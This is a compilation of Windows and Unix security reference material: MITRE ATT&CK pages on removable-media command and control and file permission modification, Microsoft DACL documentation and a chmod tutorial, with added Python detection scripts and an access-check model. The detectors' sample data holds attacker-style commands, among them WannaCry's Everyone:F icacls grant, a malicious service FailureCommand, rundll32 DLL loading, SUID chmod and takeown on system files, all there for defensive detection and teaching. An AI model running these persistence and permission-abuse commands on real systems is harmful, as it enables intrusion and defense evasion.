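            findings.append((svc, "Start", old_start, new_start,
                             "start type changed from manual/disabled to automatic"))
    return findings


def new_services(baseline, current):
    """Names of services that exist only in the current snapshot."""
    return sorted(set(current) - set(baseline))


# Constructed snapshots (not real telemetry): BASELINE from a known-good host,
# CURRENT from a later export of the same host.
BASELINE = {
    "dmserver":  {"ImagePath": r"%SystemRoot%\System32\svchost.exe -k netsvcs",
                  "ServiceDll": r"%SystemRoot%\System32\dmserver.dll", "Start": 2},
    "Spooler":   {"ImagePath": r"%SystemRoot%\System32\spoolsv.exe", "Start": 2},
    "COMSysApp": {"ImagePath": r"%SystemRoot%\System32\dllhost.exe", "Start": 3},
}
CURRENT = {
    # ServiceDll swapped for a DLL dropped to disk (the PoisonIvy/GreyEnergy/Volgmer pattern).
    "dmserver":  {"ImagePath": r"%SystemRoot%\System32\svchost.exe -k netsvcs",
                  "ServiceDll": r"C:\ProgramData\dmserv.dll", "Start": 2},
    # Recovery action added: killing the spooler now runs an attacker script.
    "Spooler":   {"ImagePath": r"%SystemRoot%\System32\spoolsv.exe", "Start": 2,
                  "FailureCommand": r"cmd.exe /c C:\ProgramData\upd.bat"},
    # Rarely used service re-pointed at rundll32 and switched to automatic start.
    "COMSysApp": {"ImagePath": r"rundll32.exe C:\Users\Public\comsys.dll,Start", "Start": 2},
    # Brand-new service: New Service technique, reported separately.
    "UpdSvc":    {"ImagePath": r"C:\Users\Public\upd.exe", "Start": 2},
}

if __name__ == "__main__":
    for f in diff_services(BASELINE, CURRENT):
        print("%-10s %-15s %s -> %s  [%s]" % f)
    print("new services:", new_services(BASELINE, CURRENT))
```

Run the diff against exports taken before and after each patch cycle rather than against a single point in time. A FailureCommand appearing on a service nobody configured recovery for, or a ServiceDll that moves out of System32, should be treated as persistence until proven otherwise. The action list itself (restart, reboot, run a program) is stored in the binary FailureActions value, so a complete check should decode that too.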
Communication Through Removable Media (MITRE ATT&CK, Enterprise technique page)

Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by Replication Through Removable Media. Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.

ID: T1092
Tactic: Command And Control
Platform: Linux, macOS, Windows
Data Sources: File monitoring, Data loss prevention
Version: 1.0

Mitigations

Disable or Remove Feature or Program: Disable Autorun if it is unnecessary. [1]
Operating System Configuration: Disallow or restrict removable media at an organizational policy level if they are not required for business operations.

Examples

APT28: APT28 uses a tool that captures information from air-gapped computers via an infected USB and transfers it to a network-connected computer when the USB is inserted. [4]
CHOPSTICK: Part of APT28's operation involved using CHOPSTICK modules to copy itself to air-gapped machines, using files written to USB sticks to transfer data and command traffic. [2] [3] [4]
USBStealer: USBStealer drops commands for a second victim onto a removable media drive inserted into the first victim, and the commands are executed when the drive is inserted into the second victim. [5]

Detection

Monitor file access on removable media. Detect processes that execute when removable media is mounted.

References

1. Microsoft. (n.d.). How to disable the Autorun functionality in Windows. Retrieved April 20, 2016.
2. FireEye. (2015). APT28: A Window into Russia's Cyber Espionage Operations?. Retrieved August 19, 2015.
3. ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.
4. Anthe, C. et al. (2015, October 19). Microsoft Security Intelligence Report Volume 19. Retrieved December 23, 2015.
5. Calvet, J. (2014, November 11). Sednit Espionage Group Attacking Air-Gapped Networks. Retrieved January 4, 2017.
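The two detection sentences above (file access on removable media, and processes that execute when it is mounted) as an added example that is not MITRE's code: it runs simple rules over constructed Sysmon records, Event ID 1 (process creation: Image, CommandLine, ParentImage) and Event ID 11 (file creation: Image, TargetFilename). The set of removable drive letters is assumed to come from the host's volume inventory and is hard-coded here; the file names, processes and timestamps are invented for illustration.

```python
"""Flag execution from, and file drops onto, removable volumes in Sysmon telemetry.

Added example for this page, not MITRE's code. Records are constructed in the shape
of Sysmon Event ID 1 (Image, CommandLine, ParentImage) and Event ID 11 (Image,
TargetFilename). Which drive letters are removable is assumed to come from the
host's volume inventory and is hard-coded for the example.
"""
import re

REMOVABLE_DRIVES = {"E:", "F:"}                    # assumed per-host inventory
EXPECTED_WRITERS = {r"c:\windows\explorer.exe"}    # a user copying files is normal
DRIVE_RE = re.compile(r"\b([A-Za-z]:)\\")


def drive_of(path):
    """Drive letter ("E:") of an absolute local path, or None."""
    m = re.match(r"^([A-Za-z]:)\\", path or "")
    return m.group(1).upper() if m else None


def review(events):
    """Return (reason, event) pairs for events that execute from or write to removable media."""
    findings = []
    for ev in events:
        if ev["EventID"] == 1:
            if drive_of(ev["Image"]) in REMOVABLE_DRIVES:
                findings.append(("process image on removable media", ev))
                continue
            # Interpreter on the local disk running a script staged on the stick.
            refs = {d.upper() for d in DRIVE_RE.findall(ev.get("CommandLine", ""))}
            if refs & REMOVABLE_DRIVES:
                findings.append(("command line references removable media", ev))
        elif ev["EventID"] == 11:
            # Commands/data staged for the other host are written by the implant,
            # not by Explorer on the user's behalf.
            if (drive_of(ev["TargetFilename"]) in REMOVABLE_DRIVES
                    and ev["Image"].lower() not in EXPECTED_WRITERS):
                findings.append(("file written to removable media by unexpected process", ev))
    return findings


# Constructed events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2019-05-02 09:14:03", "Image": r"E:\autorun\update.exe",
     "CommandLine": r"E:\autorun\update.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "UtcTime": "2019-05-02 09:14:09", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c F:\sync\run.bat", "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 11, "UtcTime": "2019-05-02 09:14:30",
     "Image": r"C:\Users\alice\AppData\Roaming\svchost.exe",
     "TargetFilename": r"F:\System Volume Information\cmds.dat"},
    # Benign: the user copies a photo with Explorer.
    {"EventID": 11, "UtcTime": "2019-05-02 09:15:00", "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"E:\photos\img01.jpg"},
    # Benign: local program, local file.
    {"EventID": 1, "UtcTime": "2019-05-02 09:16:00", "Image": r"C:\Windows\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt", "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for reason, ev in review(SAMPLE_EVENTS):
        print(f"{ev['UtcTime']}  {reason}: {ev.get('CommandLine') or ev.get('TargetFilename')}")
```

Both rules are coarse by design. Tune EXPECTED_WRITERS to the backup and sync tools actually used, and derive REMOVABLE_DRIVES from the host's volume inventory at collection time rather than hard-coding letters, since the same letter may be a fixed disk on another machine.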
MITRE ATT&CK, Enterprise Techniques: File Permissions Modification

File permissions are commonly managed by discretionary access control lists (DACLs) specified by the file owner. File DACL implementation may vary by platform, but generally explicitly designate which users/groups can perform which actions (ex: read, write, execute, etc.). [1] [2] [3]

Adversaries may modify file permissions/attributes to evade intended DACLs. [4] [5] Modifications may include changing specific access rights, which may require taking ownership of a file and/or elevated permissions such as Administrator/root depending on the file's existing permissions to enable malicious activity such as modifying, replacing, or deleting specific files.

Specific file modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Logon Scripts, or tainting/hijacking other instrumental binary/configuration files.

ID: T1222
Tactic: Defense Evasion
Platform: Linux, Windows, macOS
Permissions Required: User, Administrator, SYSTEM, root
Data Sources: File monitoring, Process monitoring, Process command-line parameters, Windows event logs
Defense Bypassed: File system access controls
Contributors: Jan Miller, CrowdStrike
Version: 1.0

Mitigations

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.

Examples

APT32: APT32's macOS backdoor changes the permission of the file it wants to execute to 755. [8]
JPIN: JPIN can use the command-line utility cacls.exe to change file permissions. [6]
WannaCry: WannaCry uses attrib +h and icacls . /grant Everyone:F /T /C /Q to make some of its files hidden and grant all users full access controls. [7]

Detection

Monitor and investigate attempts to modify DACLs and file ownership, such as use of icacls [9], takeown [10], attrib [11], and PowerShell Set-Acl [12] in Windows and chmod [13]/chown [14] in macOS/Linux. Many of these are built-in system utilities and may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.

Consider enabling file permission change auditing on folders containing key binary/configuration files. Windows Security Log events (Event ID 4670) are used when DACLs are modified. [15]

References

[1] Microsoft. (2018, May 30). DACLs and ACEs. Retrieved August 19, 2018.
[2] Microsoft. (2018, May 30). File Security and Access Rights. Retrieved August 19, 2018.
[3] Tutorials Point. (n.d.). Unix / Linux - File Permission / Access Modes. Retrieved August 19, 2018.
[4] Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018.
[5] Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018.
[6] Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.
[7] Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019.
[8] Dumont, R. (2019, April 9). OceanLotus: macOS malware update. Retrieved April 15, 2019.
[9] Plett, C. et al. (2017, October 17). icacls. Retrieved August 19, 2018.
[10] Plett, C. et al. (2017, October 15). takeown. Retrieved August 19, 2018.
[11] Plett, C. et al. (2017, October 15). attrib. Retrieved August 19, 2018.
[12] Microsoft. (n.d.). Set-Acl. Retrieved August 19, 2018.
[13] MacKenzie, D. & Meyering, J. (n.d.). chmod(1) - Linux man page. Retrieved August 19, 2018.
[14] MacKenzie, D. & Meyering, J. (n.d.). chown(1) - Linux man page. Retrieved August 19, 2018.
[15] Netsurion. (2014, February 19). Monitoring File Permission Changes with the Windows Security Log. Retrieved August 19, 2018.

Copyright © 2015-2019, The MITRE Corporation. MITRE ATT&CK and ATT&CK are trademarks of The MITRE Corporation.
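The detection guidance above names the utilities to watch (icacls, takeown, attrib, Set-Acl, chmod, chown) and recommends correlating permission changes with other signs of malicious activity rather than alerting on every use. The script below is an added example, not MITRE's code: it runs a small rule set over constructed process-creation log lines (a tab-separated timestamp, host, user, image path and command line; this layout is an assumption for the example, not any product's real format), grades each hit low/medium/high, and raises an icacls finding to high when takeown touched the same path shortly before, the sequence the cited sandbox report shows. All log content, paths, user names and thresholds are constructed.

```python
"""Flag suspicious file-permission changes in process-creation logs.

Added example for the T1222 detection guidance; not MITRE's code. The
input layout (tab-separated timestamp, host, user, image path, command
line) and every log line below are constructed for the example.
"""
import re
from dataclasses import dataclass
from datetime import datetime

# Constructed sample events: Windows workstation WS01 and Linux server SRV02.
SAMPLE_LOG = """\
2019-05-01T10:00:01Z\tWS01\tCORP\\alice\tC:\\Windows\\System32\\icacls.exe\ticacls C:\\Users\\alice\\notes /grant alice:R
2019-05-01T10:00:07Z\tWS01\tCORP\\alice\tC:\\Windows\\System32\\icacls.exe\ticacls . /grant Everyone:F /T /C /Q
2019-05-01T10:00:09Z\tWS01\tCORP\\alice\tC:\\Windows\\System32\\attrib.exe\tattrib +h C:\\Users\\alice\\AppData\\Local\\Temp\\dropper.exe
2019-05-01T10:01:12Z\tWS01\tCORP\\bob\tC:\\Windows\\System32\\takeown.exe\ttakeown /f C:\\Windows\\system32\\msimg64.dll
2019-05-01T10:01:13Z\tWS01\tCORP\\bob\tC:\\Windows\\System32\\icacls.exe\ticacls C:\\Windows\\system32\\msimg64.dll /grant administrators:F
2019-05-01T10:02:00Z\tWS01\tCORP\\svc_backup\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tpowershell Set-Acl -Path C:\\Windows\\Tasks -AclObject $acl
2019-05-01T10:03:44Z\tSRV02\troot\t/bin/chmod\tchmod 755 /usr/local/bin/deploy
2019-05-01T10:03:45Z\tSRV02\twww-data\t/bin/chmod\tchmod 4755 /tmp/.x/helper
2019-05-01T10:03:46Z\tSRV02\twww-data\t/bin/chown\tchown root:root /tmp/.x/helper
"""

@dataclass
class Event:
    ts: datetime
    host: str
    user: str
    tool: str      # image basename, lower-case
    cmdline: str

@dataclass
class Finding:
    event: Event
    rule: str
    severity: str  # low / medium / high

def parse_log(text):
    """Parse the constructed tab-separated layout into Event objects."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, user, image, cmdline = line.split("\t", 4)
        tool = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
        events.append(Event(datetime.fromisoformat(ts.replace("Z", "+00:00")),
                            host, user, tool, cmdline))
    return events

# Principals whose Full-control grant is almost never legitimate on a file.
BROAD = r"(?:everyone|users|authenticated users|\*s-1-1-0|\*s-1-5-11)"

def match_rule(ev):
    """Return (rule, severity) for one event, or None when nothing applies."""
    cl = ev.cmdline.lower()
    if ev.tool in ("icacls.exe", "cacls.exe"):
        if re.search(r"/grant(?::r)?\s+" + BROAD + r":\(?[a-z(),]*f\b", cl):
            return "icacls grants Full control to a broad principal", "high"
        if "\\windows\\" in cl or "\\program files" in cl:
            return "icacls changes a DACL under a system directory", "medium"
        return "icacls DACL change", "low"
    if ev.tool == "takeown.exe":
        return "takeown changes file ownership", "medium"
    if ev.tool == "attrib.exe" and re.search(r"(?:^|\s)\+h\b", cl):
        return "attrib hides a file", "low"
    if ev.tool in ("powershell.exe", "pwsh.exe") and "set-acl" in cl:
        return "PowerShell Set-Acl", "medium"
    if ev.tool == "chmod":
        m = re.search(r"\bchmod\s+(?:-\S+\s+)*(\S+)", cl)
        mode = m.group(1) if m else ""
        # 4-digit octal with setuid/setgid (2xxx..7xxx) or a symbolic +s clause
        if re.fullmatch(r"[2-7][0-7]{3}", mode) or re.search(r"\+[rwxt]*s", mode):
            return "chmod sets SUID/SGID", "high"
        if mode in ("777", "666") or re.search(r"(?:^|,)(?:[ugo]*[oa][ugo]*)?\+[rxst]*w", mode):
            return "chmod makes a file world-writable", "medium"
        return "chmod permission change", "low"
    if ev.tool == "chown":
        if re.search(r"\bchown\s+(?:-\S+\s+)*root\b", cl):
            return "chown hands a file to root", "medium"
        return "chown ownership change", "low"
    return None

def target_path(ev):
    """Best-effort target path: takeown uses /f <path>, icacls takes <path> first."""
    low = [t.lower().strip('"') for t in ev.cmdline.split()]
    if ev.tool == "takeown.exe" and "/f" in low and low.index("/f") + 1 < len(low):
        return low[low.index("/f") + 1]
    if ev.tool in ("icacls.exe", "cacls.exe") and len(low) > 1:
        return low[1]
    return None

def analyze(text, window_seconds=60):
    """Run the rules, then raise icacls findings that follow takeown on the same path."""
    findings = []
    for ev in parse_log(text):
        hit = match_rule(ev)
        if hit:
            findings.append(Finding(ev, hit[0], hit[1]))
    takeowns = [f.event for f in findings if f.event.tool == "takeown.exe"]
    for f in findings:
        path = target_path(f.event) if f.event.tool in ("icacls.exe", "cacls.exe") else None
        for t in takeowns:
            delta = (f.event.ts - t.ts).total_seconds()
            if path and t.host == f.event.host and target_path(t) == path and 0 <= delta <= window_seconds:
                f.rule += " after takeown on the same path"
                f.severity = "high"
                break
    return findings

def summarize(findings):
    """Count findings per severity."""
    counts = {"low": 0, "medium": 0, "high": 0}
    for f in findings:
        counts[f.severity] += 1
    return counts

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f.severity:6} {f.event.ts:%H:%M:%S} {f.event.host} {f.event.user:16} {f.rule}")
    print(summarize(analyze(SAMPLE_LOG)))
```

The low-severity hits are the baseline noise the page warns about (an administrator running chmod 755, a user adjusting her own folder); they are kept as findings only so they can be tuned against a site's normal usage. The correlation step is the part worth copying into a real pipeline: on its own, takeown is medium, but takeown immediately followed by icacls on a file under the Windows directory is the ownership-then-DACL pattern from the sandbox report, and the pair is worth an alert.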
DACLs and ACEs (Windows applications | Microsoft Docs, 05/31/2018)

If a Windows object does not have a discretionary access control list (DACL), the system allows everyone full access to it. If an object has a DACL, the system allows only the access that is explicitly allowed by the access control entries (ACEs) in the DACL. If there are no ACEs in the DACL, the system does not allow access to anyone. Similarly, if a DACL has ACEs that allow access to a limited set of users or groups, the system implicitly denies access to all trustees not included in the ACEs.

In most cases, you can control access to an object by using access-allowed ACEs; you do not need to explicitly deny access to an object. The exception is when an ACE allows access to a group and you want to deny access to a member of the group. To do this, place an access-denied ACE for the user in the DACL ahead of the access-allowed ACE for the group. Note that the order of the ACEs is important because the system reads the ACEs in sequence until access is granted or denied. The user's access-denied ACE must appear first; otherwise, when the system reads the group's access allowed ACE, it will grant access to the restricted user.

The following illustration shows a DACL that denies access to one user and grants access to two groups. The members of Group A get Read, Write, and Execute access rights by accumulating the rights allowed to Group A and rights allowed to Everyone. The exception is Andrew, who is denied access by the access-denied ACE in spite of being a member of the Everyone Group.
File Security and Access Rights (Windows applications | Microsoft Docs, 05/31/2018)

Because files are securable objects, access to them is regulated by the access-control model that governs access to all other securable objects in Windows. For a detailed explanation of this model, see Access Control.

You can specify a security descriptor for a file or directory when you call the CreateFile, CreateDirectory, or CreateDirectoryEx function. If you specify NULL for the lpSecurityAttributes parameter, the file or directory gets a default security descriptor. The access control lists (ACL) in the default security descriptor for a file or directory are inherited from its parent directory. Note that a default security descriptor is assigned only when a file or directory is newly created, and not when it is renamed or moved.

To retrieve the security descriptor of a file or directory object, call the GetNamedSecurityInfo or GetSecurityInfo function. To change the security descriptor of a file or directory object, call the SetNamedSecurityInfo or SetSecurityInfo function.

The valid access rights for files and directories include the DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, and SYNCHRONIZE standard access rights. The table in File Access Rights Constants lists the access rights that are specific to files and directories.

Although the SYNCHRONIZE access right is defined within the standard access rights list as the right to specify a file handle in one of the wait functions, when using asynchronous file I/O operations you should wait on the event handle contained in a properly configured OVERLAPPED structure rather than using the file handle with the SYNCHRONIZE access right for synchronization.

The following are the generic access rights for files and directories.

Access right           Description
FILE_GENERIC_EXECUTE   FILE_EXECUTE, FILE_READ_ATTRIBUTES, STANDARD_RIGHTS_EXECUTE, SYNCHRONIZE
FILE_GENERIC_READ      FILE_READ_ATTRIBUTES, FILE_READ_DATA, FILE_READ_EA, STANDARD_RIGHTS_READ, SYNCHRONIZE
FILE_GENERIC_WRITE     FILE_APPEND_DATA, FILE_WRITE_ATTRIBUTES, FILE_WRITE_DATA, FILE_WRITE_EA, STANDARD_RIGHTS_WRITE, SYNCHRONIZE

Windows compares the requested access rights and the information in the thread's access token with the information in the file or directory object's security descriptor. If the comparison does not prohibit all of the requested access rights from being granted, a handle to the object is returned to the thread and the access rights are granted. For more information about this process, see Interaction between Threads and Securable Objects.

By default, authorization for access to a file or directory is controlled strictly by the ACLs in the security descriptor associated with that file or directory. In particular, the security descriptor of a parent directory is not used to control access to any child file or directory.

The FILE_TRAVERSE access right can be enforced by removing the BYPASS_TRAVERSE_CHECKING privilege from users. This is not recommended in the general case, as many programs do not correctly handle directory traversal errors. The primary use for the FILE_TRAVERSE access right on directories is to enable conformance to certain IEEE and ISO POSIX standards when interoperability with Unix systems is a requirement.

The Windows security model provides a way for a child directory to inherit, or to be prevented from inheriting, one or more of the ACEs in the parent directory's security descriptor. Each ACE contains information that determines how it can be inherited, and whether it will have an effect on the inheriting directory object. For example, some inherited ACEs control access to the inherited directory object, and these are called effective ACEs.
All other ACEs are called inherit-only ACEs. The Windows security model also enforces the automatic inheritance of ACEs to child objects according to the ACE inheritance rules. This automatic inheritance, along with the inheritance information in each ACE, determines how security restrictions are passed down the directory hierarchy.

Note that you cannot use an access-denied ACE to deny only GENERIC_READ or only GENERIC_WRITE access to a file. This is because for file objects, the generic mappings for both GENERIC_READ and GENERIC_WRITE include the SYNCHRONIZE access right. If an ACE denies GENERIC_WRITE access to a trustee, and the trustee requests GENERIC_READ access, the request will fail because the request implicitly includes SYNCHRONIZE access which is implicitly denied by the ACE, and vice versa. Instead of using access-denied ACEs, use access-allowed ACEs to explicitly allow the permitted access rights.

Another means of managing access to storage objects is encryption. The implementation of file system encryption in Windows is the Encrypted File System, or EFS. EFS encrypts only files and not directories. The advantage of encryption is that it provides additional protection to files that is applied on the media and not through the file system and the standard Windows access control architecture. For more information on file encryption, see File Encryption.

In most cases, the ability to read and write the security settings of a file or directory object is restricted to kernel-mode processes. Clearly, you would not want any user process to be able to change the ownership or access restriction on your private file or directory. However, a backup application would not be able to complete its job of backing up your file if the access restrictions you have placed on your file or directory do not allow the application's user-mode process to read it.

Backup applications must be able to override the security settings of file and directory objects to ensure a complete backup. Similarly, if a backup application attempts to write a backup copy of your file over the disk-resident copy, and you explicitly deny write privileges to the backup application process, the restore operation cannot complete. In this case also, the backup application must be able to override the access control settings of your file.

The SE_BACKUP_NAME and SE_RESTORE_NAME access privileges were specifically created to provide this ability to backup applications. If these privileges have been granted and enabled in the access token of the backup application process, it can then call CreateFile to open your file or directory for backup, specifying the standard READ_CONTROL access right as the value of the dwDesiredAccess parameter. However, to identify the calling process as a backup process, the call to CreateFile must include the FILE_FLAG_BACKUP_SEMANTICS flag in the dwFlagsAndAttributes parameter. The full syntax of the function call is the following:

    HANDLE hFile = CreateFile(
        fileName,                    // lpFileName
        READ_CONTROL,                // dwDesiredAccess
        0,                           // dwShareMode
        NULL,                        // lpSecurityAttributes
        OPEN_EXISTING,               // dwCreationDisposition
        FILE_FLAG_BACKUP_SEMANTICS,  // dwFlagsAndAttributes
        NULL );                      // hTemplateFile

This will allow the backup application process to open your file and override the standard security checking. To restore your file, the backup application would use the following CreateFile call syntax when opening your file to be written.

    HANDLE hFile = CreateFile(
        fileName,                    // lpFileName
        WRITE_OWNER | WRITE_DAC,     // dwDesiredAccess
        0,                           // dwShareMode
        NULL,                        // lpSecurityAttributes
        CREATE_ALWAYS,               // dwCreationDisposition
        FILE_FLAG_BACKUP_SEMANTICS,  // dwFlagsAndAttributes
        NULL );                      // hTemplateFile

There are situations when a backup application must be able to change the access control settings of a file or directory. An example is when the access control settings of the disk-resident copy of a file or directory are different from the backup copy. This would happen if these settings were changed after the file or directory was backed up, or if it was corrupted. The FILE_FLAG_BACKUP_SEMANTICS flag specified in the call to CreateFile gives the backup application process permission to read the access-control settings of the file or directory. With this permission, the backup application process can then call GetKernelObjectSecurity and SetKernelObjectSecurity to read and then reset the access-control settings. If a backup application must have access to the system-level access control settings, the ACCESS_SYSTEM_SECURITY flag must be specified in the dwDesiredAccess parameter value passed to CreateFile.

Backup applications call BackupRead to read the files and directories specified for the restore operation, and BackupWrite to write them.

Related topics: Standard Access Rights
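Two statements on the Microsoft pages above are easy to get wrong in practice: the DACLs and ACEs page says ACE order decides the outcome, and the File Security page says a deny on GENERIC_WRITE also blocks a GENERIC_READ request because both file generic mappings contain SYNCHRONIZE (and, per the mapping table, READ_CONTROL as well). The Python model below is an added example, not Microsoft's code. It implements the ordered ACE walk the DACLs page describes, using the documented winnt.h access-mask values, and leaves out owner rights, privilege checks and inheritance (a simplification). The trustee names and DACLs are constructed after the page's Andrew / Group A / Everyone illustration.

```python
"""Model of the Windows DACL access check for file objects.

Added example, not Microsoft's code. Access masks are the winnt.h values;
owner rights, privileges and inheritance are left out (a simplification).
"""
FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA = 0x0001, 0x0002, 0x0004
FILE_READ_EA, FILE_WRITE_EA, FILE_EXECUTE = 0x0008, 0x0010, 0x0020
FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES = 0x0080, 0x0100
DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER = 0x10000, 0x20000, 0x40000, 0x80000
SYNCHRONIZE = 0x100000
STANDARD_RIGHTS_READ = STANDARD_RIGHTS_WRITE = STANDARD_RIGHTS_EXECUTE = READ_CONTROL

GENERIC_READ, GENERIC_WRITE, GENERIC_EXECUTE = 0x80000000, 0x40000000, 0x20000000
# The file object's generic mapping (the table on the File Security page).
FILE_GENERIC_READ = (STANDARD_RIGHTS_READ | FILE_READ_DATA | FILE_READ_ATTRIBUTES
                     | FILE_READ_EA | SYNCHRONIZE)
FILE_GENERIC_WRITE = (STANDARD_RIGHTS_WRITE | FILE_WRITE_DATA | FILE_WRITE_ATTRIBUTES
                      | FILE_WRITE_EA | FILE_APPEND_DATA | SYNCHRONIZE)
FILE_GENERIC_EXECUTE = (STANDARD_RIGHTS_EXECUTE | FILE_READ_ATTRIBUTES | FILE_EXECUTE
                        | SYNCHRONIZE)
GENERIC_MAPPING = {GENERIC_READ: FILE_GENERIC_READ,
                   GENERIC_WRITE: FILE_GENERIC_WRITE,
                   GENERIC_EXECUTE: FILE_GENERIC_EXECUTE}

ALLOW, DENY = "allow", "deny"

def map_generic(mask):
    """Replace generic bits in a mask by the file-specific rights they map to."""
    for generic, specific in GENERIC_MAPPING.items():
        if mask & generic:
            mask = (mask & ~generic) | specific
    return mask

def access_check(dacl, token, desired):
    """Evaluate `desired` for a caller whose access token holds the trustees in `token`.

    dacl is an ordered list of (ace_type, trustee, mask) or None. As the DACLs
    and ACEs page states: no DACL grants everyone full access, an empty DACL
    grants nothing, and ACEs are read in order until every requested right has
    been allowed or a deny ACE covers a right that is still outstanding.
    Returns (granted, reason).
    """
    if dacl is None:
        return True, "no DACL: full access for everyone"
    remaining = map_generic(desired)
    for ace_type, trustee, mask in dacl:
        if trustee not in token:
            continue                      # ACE is for someone else
        mask = map_generic(mask)
        if ace_type == DENY and mask & remaining:
            return False, f"denied by access-denied ACE for {trustee}"
        if ace_type == ALLOW:
            remaining &= ~mask
            if remaining == 0:
                return True, f"granted; last right came from ACE for {trustee}"
    return False, f"not granted; outstanding rights 0x{remaining:x}"

# The illustration on the DACLs and ACEs page: Andrew's deny ACE placed first.
DOC_DACL = [
    (DENY, "Andrew", GENERIC_READ | GENERIC_WRITE | GENERIC_EXECUTE),
    (ALLOW, "Group A", GENERIC_WRITE | GENERIC_EXECUTE),
    (ALLOW, "Everyone", GENERIC_READ),
]
# Same ACEs with the deny placed last: the ordering mistake the page warns about.
MISORDERED_DACL = [DOC_DACL[2], DOC_DACL[1], DOC_DACL[0]]
# Deny GENERIC_WRITE, allow GENERIC_READ: the SYNCHRONIZE trap from the File Security page.
DENY_WRITE_DACL = [(DENY, "Bob", GENERIC_WRITE), (ALLOW, "Bob", GENERIC_READ)]
# What the page recommends instead: allow only the permitted rights.
ALLOW_ONLY_DACL = [(ALLOW, "Bob", GENERIC_READ)]

if __name__ == "__main__":
    rwx = GENERIC_READ | GENERIC_WRITE | GENERIC_EXECUTE
    print("Group A member, RWX:   ", access_check(DOC_DACL, {"Alice", "Group A", "Everyone"}, rwx))
    print("Andrew, read:          ", access_check(DOC_DACL, {"Andrew", "Everyone"}, GENERIC_READ))
    print("Andrew, misordered:    ", access_check(MISORDERED_DACL, {"Andrew", "Everyone"}, GENERIC_READ))
    print("Bob, deny-write DACL:  ", access_check(DENY_WRITE_DACL, {"Bob"}, GENERIC_READ))
    print("Bob, allow-only DACL:  ", access_check(ALLOW_ONLY_DACL, {"Bob"}, GENERIC_READ))
```

The deny-write case fails at the first ACE because, once both masks are mapped, the deny mask and the outstanding read request overlap on SYNCHRONIZE and READ_CONTROL. Rewriting the DACL as a single allow ACE for the read rights gives the intended result in both directions: read is granted and a write request ends the walk with rights still outstanding.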
Unix / Linux - File Permission / Access Modes (Tutorialspoint)

In this chapter, we will discuss file permissions and access modes in Unix in detail. File ownership is an important component of Unix that provides a secure method for storing files. Every file in Unix has the following attributes:

Owner permissions: The owner's permissions determine what actions the owner of the file can perform on the file.
Group permissions: The group's permissions determine what actions a user, who is a member of the group that a file belongs to, can perform on the file.
Other (world) permissions: The permissions for others indicate what action all other users can perform on the file.
The Permission Indicators

While using the ls -l command, it displays various information related to file permission as follows:

$ ls -l /home/amrood
-rwxr-xr--  1 amrood   users 1024  Nov 2 00:10  myfile
drwxr-xr--  1 amrood   users 1024  Nov 2 00:10  mydir

Here, the first column represents different access modes, i.e., the permission associated with a file or a directory.

The permissions are broken into groups of threes, and each position in the group denotes a specific permission, in this order: read (r), write (w), execute (x).

The first three characters (2-4) represent the permissions for the file's owner. For example, -rwxr-xr-- represents that the owner has read (r), write (w) and execute (x) permission.
The second group of three characters (5-7) consists of the permissions for the group to which the file belongs. For example, -rwxr-xr-- represents that the group has read (r) and execute (x) permission, but no write permission.
The last group of three characters (8-10) represents the permissions for everyone else. For example, -rwxr-xr-- represents that there is read (r) only permission.

File Access Modes

The permissions of a file are the first line of defense in the security of a Unix system. The basic building blocks of Unix permissions are the read, write, and execute permissions, which have been described below:

Read: Grants the capability to read, i.e., view the contents of the file.
Write: Grants the capability to modify, or remove the content of the file.
Execute: A user with execute permissions can run a file as a program.

Directory Access Modes

Directory access modes are listed and organized in the same manner as any other file. There are a few differences that need to be mentioned:

Read: Access to a directory means that the user can read the contents. The user can look at the filenames inside the directory.
Write: Access means that the user can add or delete files from the directory.
Execute: Executing a directory doesn't really make sense, so think of this as a traverse permission. A user must have execute access to the bin directory in order to execute the ls or the cd command.

Changing Permissions

To change the file or the directory permissions, you use the chmod (change mode) command. There are two ways to use chmod: the symbolic mode and the absolute mode.

Using chmod in Symbolic Mode

The easiest way for a beginner to modify file or directory permissions is to use the symbolic mode. With symbolic permissions you can add, delete, or specify the permission set you want by using the operators in the following table.

Sr.No.  Chmod operator  Description
1       +               Adds the designated permission(s) to a file or directory.
2       -               Removes the designated permission(s) from a file or directory.
3       =               Sets the designated permission(s).

Here's an example using testfile. Running ls -l on the testfile shows that the file's permissions are as follows:

$ ls -l testfile
-rwxrwxr--  1 amrood   users 1024  Nov 2 00:10  testfile

Then each example chmod command from the preceding table is run on the testfile, followed by ls -l, so you can see the permission changes:

$ chmod o+wx testfile
$ ls -l testfile
-rwxrwxrwx  1 amrood   users 1024  Nov 2 00:10  testfile
$ chmod u-x testfile
$ ls -l testfile
-rw-rwxrwx  1 amrood   users 1024  Nov 2 00:10  testfile
